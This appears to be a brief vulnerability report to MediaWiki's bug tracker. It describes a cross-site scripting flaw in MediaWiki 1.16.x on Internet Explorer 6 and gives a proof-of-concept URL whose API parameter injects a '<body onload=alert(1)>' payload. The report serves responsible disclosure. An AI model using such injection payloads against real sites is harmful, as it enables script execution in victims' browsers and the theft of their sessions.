Author: masatokinugawa
Description:
I found XSS vulnerability in MediaWiki.
I tested on Internet Explorer 6.
URL:
http://www.mediawiki.org/w/api%2Ephp?action=query&meta=siteinfo&format=json&siprop=%3Cbody onload=alert(1)%3E.html
Version: 1.16.x
Severity: normal
URL: http://www.mediawiki.org/w/api%2Ephp?action=query&meta=siteinfo&format=json&siprop=%3Cbody onload=alert(1)%3E.html
See Also:
https://bugzilla.wikimedia.org/show_bug.cgi?id=62289
https://bugzilla.wikimedia.org/show_bug.cgi?id=56575